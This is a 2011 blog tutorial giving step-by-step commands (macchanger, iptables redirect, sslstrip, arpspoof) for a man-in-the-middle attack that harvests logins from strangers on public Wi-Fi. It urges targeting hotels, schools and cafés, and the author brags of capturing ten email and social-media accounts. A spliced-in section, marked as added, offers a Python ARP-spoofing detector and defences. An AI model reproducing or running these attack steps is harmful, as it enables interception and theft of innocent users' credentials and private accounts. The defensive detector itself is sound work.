
Wednesday, July 13, 2011

MITM

OK, first of all, here is what you need to run this attack using the method I will show you:
-You need to be running a backtrack OS [3/4/R1]
-To be connected to a wireless network [Any form of encryption]
-Wireless traffic

And that's it! This is going to be a short but sweet tutorial!


**This guide is intended for the sole purpose of penetration testing only**

Running Backtrack
I think that there are other methods of performing this attack that don't depend on you running Backtrack, but since I am assuming that you have cracked a network running Backtrack I don't see why this should be a problem. Also this method is very easy ;]

First of all you need to be running a version of Backtrack; for more information on how to do this, click the link to my WPA/WPA2 cracking tutorial at the top, which covers several methods of booting Backtrack from all OSes.

Finding targets
Second, you need to be connected to a wireless network with network traffic; this can basically be anywhere and any form of wireless network. If you are connected, you can attack!

A good method of maximising the effect of this attack is to target wi-fi networks with as many clients as possible, preferably in a public place. Prime examples are unsecured networks in hotels, schools, offices, cafés and any free public wi-fi spots. These are great as they don't require any cracking!

Optional

However, if you have cracked a network, then you can use a wi-fi adapter that is capable of going into monitor mode to search for the best wi-fi network. The most common wi-fi adapter capable of doing this is the ALFA AWUS036H; for more information on how to monitor wireless networks and spoof MAC addresses refer to my WPA/WPA2 cracking tutorial. This will allow you to better survey the area and choose a target network with the most clients.

Spoofing your MAC address
If you want to be safe then it is a good idea to spoof your MAC address; luckily, for this attack you don't need a wireless card capable of packet injection, any card should do fine =] This means that you only need to type the following into a terminal:
Code:
ifconfig wlan0 down
macchanger -s wlan0
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up


Where I have written wlan0 you will have to put the name of your wireless interface; however, unless you have two wireless cards it is most probably "wlan0". If you do have 2 wireless cards then you will know what to do ;]

The attack
This is the easy part! All you need to do is enter the following into a terminal:
Code:
echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sslstrip -w passwords

This will forward all wi-fi traffic back to the client so no one gets suspicious. It will also create a document on your desktop called "passwords" leave this well alone for now. Another key part of this attack is SSLstrip, this allows you to steal the info from secure web pages. (Hotmail, Facebook, Gmail, Ebay etc...)

Now leave that terminal open and open a new one. Now we need to find out the name of the gateway that we will be redirecting traffic to. To do this simply type "route" into the terminal and wait for a minute.

You should see something like this:
[Image: inqL8.png]
As you can see from this, the gateway that my wi-fi traffic is going through is called "BThomehub.Home", and the interface connected is wlan1. We now use this info when entering the next command.

Side note: You can also use:
Code:
route -n | grep 'UG[ \t]' | awk '{print $2}'
to show the IP address of the router. This is much more reliable, as the gateway name shown by route can sometimes be truncated. This is also useful if you are using ettercap.

Code:
arpspoof -i <interface> <gateway>

This will commence the MITM attack; the screen should look something like this:
[Image: insTG.png]
Now leave both of the open terminals running, they are now capturing all of the data sent across the wi-fi. Have a coffee, do your homework, go to a meeting. The longer you leave it the higher chance you will have of catching something juicy!
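What the arpspoof step looks like from the other side of the network, as an added example that is not part of the original post: a defender sniffing ARP replies on the LAN can spot exactly this attack, because the gateway IP is suddenly announced from a second MAC address, and that MAC then also claims client addresses. All addresses below are constructed sample values; the detector is a hypothetical helper, not part of any tool the post mentions.

```python
"""Flag ARP cache poisoning of the gateway from a list of observed ARP replies.

Added example (not from the original post). The sample replies are constructed;
in practice they would come from a sniffer such as tcpdump/arpwatch on the LAN.
"""
from collections import defaultdict

# Constructed sample: (sender_ip, sender_mac) from ARP "is-at" replies, in order.
SAMPLE_ARP_REPLIES = [
    ("192.168.1.254", "00:aa:bb:cc:dd:01"),   # legitimate gateway
    ("192.168.1.10",  "00:aa:bb:cc:dd:10"),   # a normal client
    ("192.168.1.254", "00:aa:bb:cc:dd:01"),
    ("192.168.1.254", "00:11:22:33:44:55"),   # gateway IP now claimed by another MAC
    ("192.168.1.10",  "00:11:22:33:44:55"),   # same MAC also claims the client
]

GATEWAY_IP = "192.168.1.254"


def detect_arp_spoof(replies, gateway_ip):
    """Return alert strings for replies matching the gateway-impersonation pattern.

    Two checks:
    1. the MAC bound to the gateway IP changes after it has been learned
       (repeated flapping between two MACs is the classic arpspoof signature);
    2. a single MAC address claims more than one IP address.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if ip == gateway_ip and known is not None and known != mac:
            alerts.append(f"gateway {ip} moved from {known} to {mac}")
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"{mac} claims multiple IPs: {sorted(mac_to_ips[mac])}")
        ip_to_mac[ip] = mac
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoof(SAMPLE_ARP_REPLIES, GATEWAY_IP):
        print("ALERT:", line)
```

A static ARP entry for the gateway on each client, or switch-side dynamic ARP inspection, removes the condition this detector is looking for.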

Processing the data
You will now have a large text or html file on your desktop; these are your results, don't open them just yet. Protip: If you have a slow computer with a low amount of RAM, don't leave your MITM attack running for too long or you could generate a text file too large for your computer to handle! Now close down your two terminals and open the text file in your favorite editor. I just use Kate advanced text editor; whichever one you use, it needs to have a search function.

I would upload some screen caps of me doing this but I don't have anyone to target to generate the file =[ so sorry about that.

In Kate once you have opened the file press F3 [or just CTRL+F in another editor] to search through the document. In Kate you want to un-tick "case sensitive".

Now the fun bit! Search the document for the following:
password=
password
pass=
pass
username=
username
user=
user
email...

Be creative and think like others. Basically keep searching through the document until you come across "username=Middle, password=i<3HF", then look above for the website they were on and voilà, you have acquired a login!

In under 2 hours in a hotel with unsecured wi-fi I got 10 logins: 2 Hotmail, 3 Facebook, 4 Gmail and one for "Gay.com" XD

Hope you enjoyed, please leave feedback =]

This attack also works for wired connections; to do this you need to change the interface you use to the interface that is connected to the wired network. To determine what this device is, use the following:
Code:
ifconfig

Now just look for the interface that has the IP address and use that instead of wlan0. All credits go to ac1dxtrem for this protip =]
